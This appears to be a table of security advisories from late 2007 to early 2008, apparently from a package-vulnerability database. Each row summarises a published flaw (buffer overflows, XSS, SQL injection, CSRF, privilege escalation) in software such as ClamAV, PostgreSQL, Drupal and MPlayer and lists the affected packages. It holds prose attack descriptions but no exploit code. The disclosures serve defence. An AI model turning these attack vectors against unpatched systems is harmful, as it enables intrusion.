| 2008-04-25 | Secunia reports: The vulnerability is caused due to an error when attaching to a TTY via the -T command line switch. This can be exploited to execute arbitrary commands with the privileges of the user running mksh via characters previously written to the attached virtual console. more... | mksh |
| 2008-04-25 | Hanno Boeck reports: The installer of serendipity 1.3 has various Cross Site Scripting issues. This is considered low priority, as attack scenarios are very unlikely. Various path fields are not escaped properly, thus filling them with javascript code will lead to XSS. MySQL error messages are not escaped, thus the database host field can also be filled with javascript. In the referrer plugin of the blog application serendipity, the referrer string is not escaped, thus leading to a permanent XSS. more... | serendipity serendipity-devel |
| 2008-04-25 | Secunia reports: A vulnerability has been reported in Openfire, which can be exploited by malicious people to cause a Denial of Service. The vulnerability is caused due to an unspecified error and can be exploited to cause a Denial of Service. more... | openfire |
| 2008-04-24 | The PostgreSQL developers report: PostgreSQL allows users to create indexes on the results of user-defined functions, known as "expression indexes". This provided two vulnerabilities to privilege escalation: (1) index functions were executed as the superuser and not the table owner during VACUUM and ANALYZE, and (2) that SET ROLE and SET SESSION AUTHORIZATION were permitted within index functions. Both of these holes have now been closed. PostgreSQL allowed malicious users to initiate a denial-of-service by passing certain regular expressions in SQL queries. First, users could create infinite loops using some specific regular expressions. Second, certain complex regular expressions could consume excessive amounts of memory. Third, out-of-range backref numbers could be used to crash the backend. DBLink functions combined with local trust or ident authentication could be used by a malicious user to gain superuser privileges. This issue has been fixed, and does not affect users who have not installed DBLink (an optional module), or who are using password authentication for local access. This same problem was addressed in the previous release cycle, but that patch failed to close all forms of the loophole. more... | postgresql postgresql-server |
| 2008-04-24 | xine Team reports: A new xine-lib version is now available. This release contains a security fix (an unchecked array index that could allows remote attackers to execute arbitrary code via a header structure containing a negative offset, which is used to dereference a function pointer.) more... | libxine |
| 2008-04-15 | Secunia reports: Some vulnerabilities have been reported in ClamAV, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a vulnerable system. 1) A boundary error exists within the "cli_scanpe()" function in libclamav/pe.c. This can be exploited to cause a heap-based buffer overflow via a specially crafted "Upack" executable. Successful exploitation allows execution of arbitrary code. 2) A boundary error within the processing of PeSpin packed executables in libclamav/spin.c can be exploited to cause a heap-based buffer overflow. Successful exploitation may allow execution of arbitrary code. 3) An unspecified error in the processing of ARJ files can be exploited to hang ClamAV. more... | clamav clamav-devel |
| 2008-04-13 | Secunia reports: A vulnerability has been reported in lighttpd, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to lighttpd not properly clearing the OpenSSL error queue. This can be exploited to close concurrent SSL connections of lighttpd by terminating one SSL connection. more... | lighttpd |
| 2008-04-13 | The ikiwiki development team reports: Cross Site Request Forging could be used to construct a link that would change a logged-in user's password or other preferences if they clicked on the link. It could also be used to construct a link that would cause a wiki page to be modified by a logged-in user. more... | ikiwiki |
| 2008-04-06 | postfix-policyd-weight does not check for symlink for its working directory. If the working directory is not already setup by the super root, an unprivileged user can link it to another directories in the system. This results in ownership/permission changes on the target directory. more... | postfix-policyd-weight |
| 2008-04-05 | If the system random number generator can be predicted by its past output, then an attacker may spoof Recursor to accept mallicious data. This leads to DNS cache poisoning and client redirection. more... | powerdns-recursor |
| 2008-04-05 | Multiple local privilege escalation are found in the symlink verification code. An attacker may use it to run a PHP script with the victim's privilege. This attack is a little harder when suphp operates in paranoid mode. For suphp that runs in owner mode which is the default in ports, immediate upgrade to latest version is advised. more... | suphp |
| 2008-04-05 | Opera Software reports of multiple security issues in Opera. All of them can lead to arbitrary code execution. Details are as the following: Newsfeed prompt can cause Opera to execute arbitrary code Resized canvas patterns can cause Opera to execute arbitrary code more... | linux-opera opera |
| 2008-03-26 | Core Security Technologies reports: A remote buffer overflow vulnerability found in a library used by both the SILC server and client to process packets containing cryptographic material may allow an un-authenticated client to executearbitrary code on the server with the privileges of the user account running the server, or a malicious SILC server to compromise client systems and execute arbitrary code with the privileges of the user account running the SILC client program. more... | silc-client silc-irssi-client silc-server |
| 2008-03-20 | SecurityFocus reports: The 'bzip2' application is prone to a remote file-handling vulnerability because the application fails to properly handle malformed files. Exploit attempts likely result in application crashes. more... | bzip2 |
| 2008-03-11 | Ian Jackson reports on the debian-security mailinglist: When a block device read or write request is made by the guest, nothing checks that the request is within the range supported by the backend, but the code in the backend typically assumes that the request is sensible. Depending on the backend, this can allow the guest to read and write arbitrary memory locations in qemu, and possibly gain control over the qemu process, escaping from the emulation/virtualisation. more... | qemu qemu-devel |
| 2008-03-10 | Dovecot reports: Security hole in blocking passdbs (MySQL always. PAM, passwd and shadow if blocking=yes) where user could specify extra fields in the password. The main problem here is when specifying "skip_password_check" introduced in v1.0.11 for fixing master user logins, allowing the user to log in as anyone without a valid password. more... | dovecot |
| 2008-03-06 | The Mplayer team reports: A buffer overflow was found in the code used to extract album titles from CDDB server answers. When parsing answers from the CDDB server, the album title is copied into a fixed-size buffer with insufficient size checks, which may cause a buffer overflow. A malicious database entry could trigger a buffer overflow in the program. That can lead to arbitrary code execution with the UID of the user running MPlayer. A buffer overflow was found in the code used to escape URL strings. The code used to skip over IPv6 addresses can be tricked into leaving a pointer to a temporary buffer with a non-NULL value; this causes the unescape code to reuse the buffer, and may lead to a buffer overflow if the old buffer is smaller than required. A malicious URL string may be used to trigger a buffer overflow in the program, that can lead to arbitrary code execution with the UID of the user running MPlayer. A buffer overflow was found in the code used to parse MOV file headers. The code read some values from the file and used them as indexes into as array allocated on the heap without performing any boundary check. A malicious file may be used to trigger a buffer overflow in the program. That can lead to arbitrary code execution with the UID of the user running MPlayer. more... | mplayer mplayer-esound mplayer-gtk mplayer-gtk-esound mplayer-gtk2 mplayer-gtk2-esound |
| 2008-03-05 | Chris Evans from the Google Security Team reports: Severity: parsing of evil PostScript file will result in arbitrary code execution. A stack-based buffer overflow in the zseticcspace() function in zicc.c allows remote arbitrary code execution via a malicious PostScript file (.ps) that contains a long Range array. more... | ghostscript-gpl ghostscript-gpl-nox11 |
| 2008-02-29 | PCRE developers report: A character class containing a very large number of characters with codepoints greater than 255 (in UTF-8 mode, of course) caused a buffer overflow. more... | pcre |
| 2008-02-27* | Timo Sirainen reports: There are various bugs in up-imapproxy which can crash it. Since up-imapproxy runs in a single process with each connection handled in a separate thread, any crash kills all the connections and stops listening for new ones. In 64bit systems it might be possible to make it leak data (mails, passwords, ..) from other connections to attacker's connection. However I don't think up-imapproxy actually works in any 64bit system so this is just a theoretical problem. more... | pop3proxy up-imapproxy |
| 2008-02-26 | xine Team reports: A new xine-lib version is now available. This release contains a security fix (array index vulnerability which may lead to a stack buffer overflow. more... | libxine |
| 2008-02-26* | MoinMoin Security advisory XSS issue in login action XSS issue in AttachFile action XSS issue in RenamePage/DeletePage action XSS issue in gui editor more... | moinmoin |
| 2008-02-25 | Coppermine Security advisory The development team is releasing a security update for Coppermine in order to counter a recently discovered cross-site-scripting vulnerability. more... | coppermine |
| 2008-02-22 | Opera Software ASA reports about multiple security fixes: Fixed an issue where simulated text inputs could trick users into uploading arbitrary files, as reported by Mozilla. Image properties can no longer be used to execute scripts, as reported by Max Leonov. Fixed an issue where the representation of DOM attribute values could allow cross site scripting, as reported by Arnaud.lb. more... | linux-opera opera opera-devel |
| 2008-02-22 | Secunia Advisory reports: A vulnerability has been reported in OpenLDAP, which can be exploited by malicious users to cause a DoS (Denial of Service). more... | openldap-server |
| 2008-02-15 | iDefense Security Advisory 02.12.08: Remote exploitation of an integer overflow vulnerability in Clam AntiVirus' ClamAV, as included in various vendors' operating system distributions, allows attackers to execute arbitrary code with the privileges of the affected process. The vulnerability exists within the code responsible for parsing and scanning PE files. While iterating through all sections contained in the PE file, several attacker controlled values are extracted from the file. On each iteration, arithmetic operations are performed without taking into consideration 32-bit integer wrap. Since insufficient integer overflow checks are present, an attacker can cause a heap overflow by causing a specially crafted Petite packed PE binary to be scanned. This results in an exploitable memory corruption condition. Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the process using libclamav. In the case of the clamd program, this will result in code execution with the privileges of the clamav user. Unsuccessful exploitation results in the clamd process crashing. Workaround Disabling the scanning of PE files will prevent exploitation. If using clamscan, this can be done by running clamscan with the '--no-pe' option. If using clamdscan, set the 'ScanPE' option in the clamd.conf file to 'no'. more... | clamav |
| 2008-02-13* | Gentoo reports: A remote attacker could entice a user to install a specially crafted "rc" file to execute arbitrary code via long strings in the "Name" and "Comment" fields or via unspecified vectors involving the second vulnerability. more... | libxfce4gui xfce4-panel |
| 2008-02-12 | The cacti development team reports: Multiple security vulnerabilities have been discovered in Cacti's web interface: XSS vulnerabilities Path disclosure vulnerabilities SQL injection vulnerabilities HTTP response splitting vulnerabilities more... | cacti |
| 2008-02-12* | Nico Golde reports: A local attacker could exploit this vulnerability to conduct symlink attacks to overwrite files with the privileges of the user running Claws Mail. more... | claws-mail |
| 2008-02-11 | The ikiwiki development team reports: The htmlscrubber did not block javascript in uris. This was fixed by adding a whitelist of valid uri types, which does not include javascript. Some urls specifyable by the meta plugin could also theoretically have been used to inject javascript; this was also blocked. more... | ikiwiki |
| 2008-02-09 | zenphoto project reports: A new zenphoto version is now available. This release contains security fixes for HTML, XSS, and SQL injection vulnerabilities. more... | zenphoto |
| 2008-02-04 | Greg Wilkins reports: jetty allows remote attackers to bypass protection mechanisms and read the source of files via multiple '/' characters in the URI. more... | jetty |
| 2008-01-31* | Securiweb reports: dircproxy allows remote attackers to cause a denial of service (segmentation fault) via an ACTION command without a parameter, which triggers a NULL pointer dereference, as demonstrated using a blank /me message from irssi. more... | dircproxy dircproxy-devel |
| 2008-01-29 | xine project reports: A new xine-lib version is now available. This release contains a security fix (remotely-expoitable buffer overflow, CVE-2006-1664). (This is not the first time that that bug has been fixed...) It also fixes a few more recent bugs, such as the audio output problems in 1.1.9. more... | libxine |
| 2008-01-23 | Matthieu Herrb of X.Org reports: Several vulnerabilities have been identified in server code of the X window system caused by lack of proper input validation on user controlled data in various parts of the software, causing various kinds of overflows. Exploiting these overflows will crash the X server or, under certain circumstances allow the execution of arbitray machine code. When the X server is running with root privileges (which is the case for the Xorg server and for most kdrive based servers), these vulnerabilities can thus also be used to raise privileges. All these vulnerabilities, to be exploited succesfully, require either an already established connection to a running X server (and normally running X servers are only accepting authenticated connections), or a shell access with a valid user on the machine where the vulnerable server is installed. more... | libXfont xorg-server |
| 2008-01-20* | A Gentoo Advisory reports: The FreeRADIUS server is vulnerable to an SQL injection attack and a buffer overflow, possibly resulting in disclosure and modification of data and Denial of Service. more... | freeradius freeradius-devel |
| 2008-01-19 | Secunia reports: A vulnerability has been reported in IRC Services, which can be exploited by malicious people to cause a Denial of Service. The vulnerability is caused due to the improper handling of overly long passwords within the "default_encrypt()" function in encrypt.c and can be exploited to crash an affected server. more... | ircservices |
| 2008-01-19 | xine project reports: A new xine-lib version is now available. This release contains a security fix (remotely-expoitable buffer overflow, CVE-2008-0225). It also contains a read-past-end fix for an internal library function which is only used if the OS does not supply it and a rendering fix for Darwin/PPC. more... | libxine |
| 2008-01-15 | Geeklog reports: MustLive pointed out a possible XSS in the form to email an article to a friend that we're fixing with this release. Please note that this problem only exists in Geeklog 1.4.0 - neither Geeklog 1.4.1 nor any older versions (1.3.x series) have that problem. more... | geeklog |
| 2008-01-14* | The PHP development team reports: Security Enhancements and Fixes in PHP 5.2.4: Fixed a floating point exception inside wordwrap() (Reported by Mattias Bengtsson) Fixed several integer overflows inside the GD extension (Reported by Mattias Bengtsson) Fixed size calculation in chunk_split() (Reported by Gerhard Wagner) Fixed integer overflow in str[c]spn(). (Reported by Mattias Bengtsson) Fixed money_format() not to accept multiple %i or %n tokens. (Reported by Stanislav Malyshev) Fixed zend_alter_ini_entry() memory_limit interruption vulnerability. (Reported by Stefan Esser) Fixed INFILE LOCAL option handling with MySQL extensions not to be allowed when open_basedir or safe_mode is active. (Reported by Mattias Bengtsson) Fixed session.save_path and error_log values to be checked against open_basedir and safe_mode (CVE-2007-3378) (Reported by Maksymilian Arciemowicz) Fixed a possible invalid read in glob() win32 implementation (CVE-2007-3806) (Reported by shinnai) Fixed a possible buffer overflow in php_openssl_make_REQ (Reported by zatanzlatan at hotbrev dot com) Fixed an open_basedir bypass inside glob() function (Reported by dr at peytz dot dk) Fixed a possible open_basedir bypass inside session extension when the session file is a symlink (Reported by c dot i dot morris at durham dot ac dot uk) Improved fix for MOPB-03-2007. Corrected fix for CVE-2007-2872. more... | php4 php5 |
| 2008-01-11 | The Drupal Project reports: The aggregator module fetches items from RSS feeds and makes them available on the site. The module provides an option to remove items from a particular feed. This has been implemented as a simple GET request and is therefore vulnerable to cross site request forgeries. For example: Should a privileged user view a page containing an tag with a specially constructed src pointing to a remove items URL, the items would be removed. more... | drupal4 drupal5 |
| 2008-01-11 | The Drupal Project reports: When outputting plaintext Drupal strips potentially dangerous HTML tags and attributes from HTML, and escapes characters which have a special meaning in HTML. This output filtering secures the site against cross site scripting attacks via user input. Certain byte sequences that are invalid in the UTF8 specification are not handled properly by Internet Explorer 6 and may lead it to see a multibyte start character where none is present. Internet Explorer 6 then consumes a number of subsequent UTF-8 characters. This may lead to unsafe attributes that were outside a tag for the filter to appear inside a tag for Internet Explorer 6. This behaviour can then be used to insert and execute javascript in the context of the website. more... | drupal4 drupal5 |
| 2008-01-11 | The Drupal Project reports: When theme .tpl.php files are accessible via the web and the PHP setting register_globals is set to enabled, anonymous users are able to execute cross site scripting attacks via specially crafted links. Drupal's .htaccess attempts to set register_globals to disabled and also prevents access to .tpl.php files. Only when both these measures are not effective and your PHP interpreter is configured with register_globals set to enabled, will this issue affect you. more... | drupal4 drupal5 |
| 2008-01-10 | Secunia reports: A vulnerability has been reported in MaraDNS, which can be exploited by malicious people to cause a Denial of Service. The vulnerability is caused due to an error within the handling of certain DNS packets. This can be exploited to cause a resource rotation by sending specially crafted DNS packets, which cause an authoritative CNAME record to not resolve, resulting in a Denial of Sevices. more... | maradns |
| 2008-01-07* | Secunia reports: A vulnerability has been reported in LSH, which potentially can be exploited by malicious people to cause a DoS (Denial of Service). more... | lsh |
| 2008-01-04 | Secunia reports: Multiple vulnerabilities have been reported in RealPlayer/RealOne/HelixPlayer, which can be exploited by malicious people to compromise a user's system. An input validation error when processing .RA/.RAM files can be exploited to cause a heap corruption via a specially crafted .RA/.RAM file with an overly large size field in the header. An error in the processing of .PLS files can be exploited to cause a memory corruption and execute arbitrary code via a specially crafted .PLS file. An input validation error when parsing .SWF files can be exploited to cause a buffer overflow via a specially crafted .SWF file with malformed record headers. A boundary error when processing rm files can be exploited to cause a buffer overflow. more... | linux-realplayer |
| 2008-01-03 | Adobe Security bulletin: Critical vulnerabilities have been identified in Adobe Flash Player that could allow an attacker who successfully exploits these potential vulnerabilities to take control of the affected system. A malicious SWF must be loaded in Flash Player by the user for an attacker to exploit these potential vulnerabilities. Users are recommended to update to the most current version of Flash Player available for their platform. more... | linux-flashplugin |
| 2007-12-31* | A Buffer overflow in the ReadImage function in generic/tkImgGIF.c in Tcl/Tk, allows remote attackers to execute arbitrary code via multi-frame interlaced GIF files in which later frames are smaller than the first. more... | tcl tcl-threads tk tk-threads |
| 2007-12-29 | Dovecot reports: If two users with the same password and same pass_filter variables log in within auth_cache_ttl seconds (1h by default), the second user may get logged in with the first user's cached pass_attrs. For example if pass_attrs contained the user's home/mail directory, this would mean that the second user will be accessing the first user's mails. more... | dovecot |
| 2007-12-29* | The Gallery team reports: Gallery 2.2.4 addresses the following security vulnerabilities: Publish XP module - Fixed unauthorized album creation and file uploads. URL rewrite module - Fixed local file inclusion vulnerability in unsecured admin controller and information disclosure in hotlink protection. Core / add-item modules - Fixed Cross Site Scripting (XSS) vulnerabilities through malicious file names. Installation (Gallery application) - Update web-accessibility protection of the storage folder for Apache 2.2. Core (Gallery application) / MIME module - Fixed vulnerability in checks for disallowed file extensions in file uploads. Gallery Remote module - Added missing permissions checks for some GR commands. WebDAV module - Fixed Cross Site Scripting (XSS) vulnerability through HTTP PROPPATCH. WebDAV module - Fixed information (item data) disclosure in a WebDAV view. Comment module - Fixed information (item data) disclosure in comment views. Core module (Gallery application) - Improved resilience against item information disclosure attacks. Slideshow module - Fixed information (item data) disclosure in the slideshow. Print modules - Fixed information (item data) disclosure in several print modules. Core / print modules - Fixed arbitrary URL redirection (phishing attacks) in the core module and several print modules. WebCam module - Fixed proxied request weakness. more... | gallery2 |
| 2007-12-29* | Opera Software ASA reports about multiple security fixes: Fixed an issue where plug-ins could be used to allow cross domain scripting, as reported by David Bloom. Details will be disclosed at a later date. Fixed an issue with TLS certificates that could be used to execute arbitrary code, as reported by Alexander Klink (Cynops GmbH). Details will be disclosed at a later date. Rich text editing can no longer be used to allow cross domain scripting, as reported by David Bloom. See our advisory. Prevented bitmaps from revealing random data from memory, as reported by Gynvael Coldwind. Details will be disclosed at a later date. more... | linux-opera opera opera-devel |
| 2007-12-22* | The Wireshark team reports of multiple vulnerabilities: Wireshark could crash when reading an MP3 file. Beyond Security discovered that Wireshark could loop excessively while reading a malformed DNP packet. Stefan Esser discovered a buffer overflow in the SSL dissector. The ANSI MAP dissector could be susceptible to a buffer overflow on some platforms. The Firebird/Interbase dissector could go into an infinite loop or crash. The NCP dissector could cause a crash. The HTTP dissector could crash on some systems while decoding chunked messages. The MEGACO dissector could enter a large loop and consume system resources. The DCP ETSI dissector could enter a large loop and consume system resources. Fabiodds discovered a buffer overflow in the iSeries (OS/400) Communication trace file parser. The PPP dissector could overflow a buffer. The Bluetooth SDP dissector could go into an infinite loop. A malformed RPC Portmap packet could cause a crash. The IPv6 dissector could loop excessively. The USB dissector could loop excessively or crash. The SMB dissector could crash. The RPL dissector could go into an infinite loop. The WiMAX dissector could crash due to unaligned access on some platforms. The CIP dissector could attempt to allocate a huge amount of memory and crash. Impact It may be possible to make Wireshark or Ethereal crash or use up available memory by injecting a purposefully malformed packet onto the wire or by convincing someone to read a malformed packet trace file. more... | ethereal ethereal-lite tethereal tethereal-lite wireshark wireshark-lite |
| 2007-12-20 | Theodore Y. Ts'o reports: Fix a potential security vulnerability where an untrusted filesystem can be corrupted in such a way that a program using libext2fs will allocate a buffer which is far too small. This can lead to either a crash or potentially a heap-based buffer overflow crash. No known exploits exist, but main concern is where an untrusted user who possesses privileged access in a guest Xen environment could corrupt a filesystem which is then accessed by thus allowing the untrusted user to gain privileged access in the host OS. Thanks to the McAfee AVERT Research group for reporting this issue. more... | e2fsprogs |
| 2007-12-19 | Luigi Auriemma reports that peercast is vulnerable to a buffer overflow which could lead to a DoS or potentially remote code execution: The handshakeHTTP function which handles all the requests received by the other clients is vulnerable to a heap overflow which allows an attacker to fill the loginPassword and loginMount buffers located in the Servent class with how much data he wants. more... | peercast |
| 2007-12-18* | The Ganglia project reports: The Ganglia development team is pleased to release Ganglia 3.0.6 (Foss) which is available[...]. This release includes a security fix for web frontend cross-scripting vulnerability. more... | ganglia-webfrontend |
| 2007-12-14* | SecurityFocus reports: QEMU is prone to a local denial-of-service vulnerability because it fails to perform adequate boundary checks when handling user-supplied input. Attackers can exploit this issue to cause denial-of-service conditions. Given the nature of the issue, attackers may also be able to execute arbitrary code, but this has not been confirmed. more... | qemu qemu-devel |
| 2007-12-14* | Mozilla Foundation reports: The Firefox 2.0.0.10 update contains fixes for three bugs that improve the stability of the product. These crashes showed some evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code. more... | firefox flock linux-firefox linux-firefox-devel linux-flock linux-seamonkey linux-seamonkey-devel seamonkey |
| 2007-12-14* | The Mozilla Foundation reports a vulnerability within the mozilla browser. This vulnerability also affects various other browsers like firefox and seamonkey. The vulnerability is caused by QuickTime Media-Link files that contain a qtnext attribute. This could allow an attacker to start the browser with arbitrary command-line options. This could allow the attacker to install malware, steal local data and possibly execute and/or do other arbitrary things within the users context. more... | firefox firefox-ja linux-firefox linux-firefox-devel linux-mozilla linux-mozilla-devel linux-seamonkey linux-seamonkey-devel mozilla seamonkey |
| 2007-12-12 | The Drupal Project reports: The function taxonomy_select_nodes() directly injects variables into SQL queries instead of using placeholders. While taxonomy module itself validates the input passed to taxonomy_select_nodes(), this is a weakness in Drupal core. Several contributed modules, such as taxonomy_menu, ajaxLoader, and ubrowser, directly pass user input to taxonomy_select_nodes(), enabling SQL injection attacks by anonymous users. more... | drupal4 drupal5 |
| 2007-12-12 | Secunia reports: Format string vulnerability in the SMBDirList function in dirlist.c in SmbFTPD 0.96 allows remote attackers to execute arbitrary code via format string specifiers in a directory name. more... | smbftpd |
| 2007-12-10 | Cross-site scripting (XSS) vulnerability in Dump Servlet in Mortbay Jetty before 6.1.6rc1 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters and cookies. Mortbay Jetty before 6.1.6rc1 does not properly handle "certain quote sequences" in HTML cookie parameters, which allows remote attackers to hijack browser sessions via unspecified vectors. CRLF injection vulnerability in Mortbay Jetty before 6.1.6rc0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via unspecified vectors. more... | jetty |
| 2007-12-09* | The live555 development team reports: Fixed a bounds-checking error in "parseRTSPRequestString()" caused by an int vs. unsigned problem. The function which handles the incoming queries from the clients is affected by a vulnerability which allows an attacker to crash the server remotely using the smallest RTSP query possible to use. more... | liveMedia |
| 2007-12-07* | Squid secuirty advisory reports: Due to incorrect bounds checking Squid is vulnerable to a denial of service check during some cache update reply processing. This problem allows any client trusted to use the service to perform a denial of service attack on the Squid service. more... | squid |
| 2007-12-05 | GNU security announcement: GNU Finger unfortunately has not been updated in many years, and has known security vulnerabilities. Please do not use it in production environments. more... | gnu-finger |
| 2007-12-01* | Rails core team reports: All users of Rails 1.2.4 or earlier are advised to upgrade to 1.2.5, though it isn't strictly necessary if you aren't working with JSON. For more information the JSON vulnerability, see CVE-2007-3227. more... | rubygem-activesupport rubygem-rails |
| 2007-11-27 | Rails core team reports: The rails core team has released ruby on rails 1.2.6 to address a bug in the fix for session fixation attacks (CVE-2007-5380). The CVE Identifier for this new issue is CVE-2007-6077. more... | rubygem-rails |
| 2007-11-27 | The ikiwiki development team reports: Ikiwiki did not check if path to the srcdir to contained a symlink. If an attacker had commit access to the directories in the path, they could change it to a symlink, causing ikiwiki to read and publish files that were not intended to be published. (But not write to them due to other checks.) more... | ikiwiki |
| 2007-11-21 | phpMyAdmin security announcement: The login page auth_type cookie was vulnerable to XSS via the convcharset parameter. An attacker could use this to execute malicious code on the visitors computer more... | phpmyadmin |
| 2007-11-17* | ISS X-Force reports: PostNuke is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements to the admin section using the hits parameter, which could allow the attacker to view, add, modify or delete information in the back-end database. more... | postnuke |
| 2007-11-16 | PHP project reports: Security Enhancements and Fixes in PHP 5.2.5: Fixed dl() to only accept filenames. Reported by Laurent Gaffie. Fixed dl() to limit argument size to MAXPATHLEN (CVE-2007-4887). Reported by Laurent Gaffie. Fixed htmlentities/htmlspecialchars not to accept partial multibyte sequences. Reported by Rasmus Lerdorf Fixed possible triggering of buffer overflows inside glibc implementations of the fnmatch(), setlocale() and glob() functions. Reported by Laurent Gaffie. Fixed "mail.force_extra_parameters" php.ini directive not to be modifiable in .htaccess due to the security implications. Reported by SecurityReason. Fixed bug #42869 (automatic session id insertion adds sessions id to non-local forms). Fixed bug #41561 (Values set with php_admin_* in httpd.conf can be overwritten with ini_set()). more... | php5 |
| 2007-11-16* | SUN reports: A vulnerability in the Java Runtime Environment (JRE) with applet caching may allow an untrusted applet that is downloaded from a malicious website to make network connections to network services on machines other than the one that the applet was downloaded from. This may allow network resources (such as web pages) and vulnerabilities (that exist on these network services) which are not otherwise normally accessible to be accessed or exploited. more... | jdk linux-blackdown-jdk linux-sun-jdk |
| 2007-11-14* | CVE reports: The SNMP agent (snmp_agent.c) in net-snmp before 5.4.1 allows remote attackers to cause a denial of service (CPU and memory consumption) via a GETBULK request with a large max-repeaters value. more... | net-snmp |
| 2007-11-14* | Secunia Research reports: Secunia Research has discovered some vulnerabilities in Xpdf, which can be exploited by malicious people to compromise a user's system. An array indexing error within the "DCTStream::readProgressiveDataUnit()" method in xpdf/Stream.cc can be exploited to corrupt memory via a specially crafted PDF file. An integer overflow error within the "DCTStream::reset()" method in xpdf/Stream.cc can be exploited to cause a heap-based buffer overflow via a specially crafted PDF file. A boundary error within the "CCITTFaxStream::lookChar()" method in xpdf/Stream.cc can be exploited to cause a heap-based buffer overflow by tricking a user into opening a PDF file containing a specially crafted "CCITTFaxDecode" filter. Successful exploitation may allow execution of arbitrary code. more... | cups-base gpdf kdegraphics koffice poppler xpdf |
| 2007-11-13 | iDefense Laps reports: Remote exploitation of multiple integer overflow vulnerabilities in libFLAC, as included with various vendor's software distributions, allows attackers to execute arbitrary code in the context of the currently logged in user. These vulnerabilities specifically exist in the handling of malformed FLAC media files. In each case, an integer overflow can occur while calculating the amount of memory to allocate. As such, insufficient memory is allocated for the data that is subsequently read in from the file, and a heap based buffer overflow occurs. more... | flac |
| 2007-11-12 | US-CERT reports: webserver.c in mt-dappd in Firefly Media Server 0.2.4 and earlier allows remote attackers to cause a denial of service (NULL dereference and daemon crash) via a stats method action to /xml-rpc with (1) an empty Authorization header line, which triggers a crash in the ws_decodepassword function; or (2) a header line without a ':' character, which triggers a crash in the ws_getheaders function. more... | mt-daapd |
| 2007-11-12 | Plone projectreports: This hotfix corrects a vulnerability in the statusmessages and linkintegrity modules, where unsafe network data was interpreted as python pickles. This allows an attacker to run arbitrary python code within the Zope/Plone process. more... | plone |
| 2007-11-12* | Secunia reports: Secunia Research has discovered a vulnerability in CUPS, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a boundary error within the "ippReadIO()" function in cups/ipp.c when processing IPP (Internet Printing Protocol) tags. This can be exploited to overwrite one byte on the stack with a zero by sending an IPP request containing specially crafted "textWithLanguage" or "nameWithLanguage" tags. Successful exploitation allows execution of arbitrary code. more... | cups-base |
| 2007-11-11 | The DigiTrust Group reports: When creating a new database, a malicious user can use a client-side Web proxy to place malicious code in the db parameter of the POST request. Since db_create.php does not properly sanitize user-supplied input, an administrator could face a persistent XSS attack when the database names are displayed. more... | phpMyAdmin |
| 2007-11-11* | Gentoo reports: Kalle Olavi Niemitalo discovered two boundary errors in fsplib code included in gFTP when processing overly long directory or file names. A remote attacker could trigger these vulnerabilities by enticing a user to download a file with a specially crafted directory or file name, possibly resulting in the execution of arbitrary code or a Denial of Service. more... | gftp |
| 2007-11-09 | Gallery project reports: Gallery 2.2.3 addresses the following security vulnerabilities: Unauthorized renaming of items possible with WebDAV (reported by Merrick Manalastas) Unauthorized modification and retrieval of item properties possible with WebDAV Unauthorized locking and replacing of items possible with WebDAV Unauthorized editing of data file possible via linked items with Reupload and WebDAV (reported by Nicklous Roberts) more... | gallery2 |
| 2007-11-07* | Red Hat reports: A flaw was found in Perl's regular expression engine. Specially crafted input to a regular expression can cause Perl to improperly allocate memory, possibly resulting in arbitrary code running with the permissions of the user running Perl. more... | perl perl-threaded |
| 2007-11-07* | Kevin Finisterre discovered bugs in perl's I/O debug support: The environmental variable PERLIO_DEBUG is honored even by the set-user-ID perl command (usually named sperl or suidperl). As a result, a local attacker may be able to gain elevated privileges. (CVE-2005-0155) A buffer overflow may occur in threaded versions of perl when the full pathname of the script being executed is very long. (CVE-2005-0156). Note: By default, no set-user-ID perl binary is installed. An administrator must enable it manually at build time with the ENABLE_SUIDPERL port flag. more... | perl perl-threaded |
| 2007-11-07* | Jeroen van Wolffelaar reports that the Perl module File::Path contains a race condition wherein traversed directories and files are temporarily made world-readable/writable. more... | perl perl-threaded |
| 2007-11-06 | Debian project reports: Tavis Ormandy of the Google Security Team has discovered several security issues in PCRE, the Perl-Compatible Regular Expression library, which potentially allow attackers to execute arbitrary code by compiling specially crafted regular expressions. more... | pcre pcre-utf8 |
| 2007-11-05 | SEC-Consult reports: Perdition IMAP is affected by a format string bug in one of its IMAP output-string formatting functions. The bug allows the execution of arbitrary code on the affected server. A successful exploit does not require prior authentication. more... | perdition |
| 2007-11-01 | A Secunia Advisory report: Input passed to the "posts_columns" parameter in wp-admin/edit-post-rows.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | de-wordpress wordpress zh-wordpress |
| 2007-10-31* | BugTraq reports: OpenLDAP is prone to multiple remote denial-of-service vulnerabilities because of an incorrect NULL-termination issue and a double-free issue. more... | openldap-server |
| 2007-10-31* | Kazu Nambo reports: URL decoding the the Apache webserver prior to decoding in the Tomcat server could pypass access control rules and give access to pages on a different AJP by sending a crafted URL. more... | mod_jk mod_jk-ap2 |
| 2007-10-27 | Django project reports: A per-process cache used by Django's internationalization ("i18n") system to store the results of translation lookups for particular values of the HTTP Accept-Language header used the full value of that header as a key. An attacker could take advantage of this by sending repeated requests with extremely large strings in the Accept-Language header, potentially causing a denial of service by filling available memory. Due to limitations imposed by Web server software on the size of HTTP header fields, combined with reasonable limits on the number of requests which may be handled by a single server process over its lifetime, this vulnerability may be difficult to exploit. Additionally, it is only present when the "USE_I18N" setting in Django is "True" and the i18n middleware component is enabled*. Nonetheless, all users of affected versions of Django are encouraged to update. more... | py23-django py23-django-devel py24-django py24-django-devel py25-django py25-django-devel |
| 2007-10-26* | The DigiTrust Group discovered serious XSS vulnerability in the phpMyAdmin server_status.php script. According to their report vulnerability can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | phpMyAdmin |
| 2007-10-25 | An advisory from Opera reports: If a user has configured Opera to use an external newsgroup client or e-mail application, specially crafted Web pages can cause Opera to run that application incorrectly. In some cases this can lead to execution of arbitrary code. When accesing frames from different Web sites, specially crafted scripts can bypass the same-origin policy, and overwrite functions from those frames. If scripts on the page then run those functions, this can cause the script of the attacker's choice to run in the context of the target Web site. more... | linux-opera opera opera-devel |
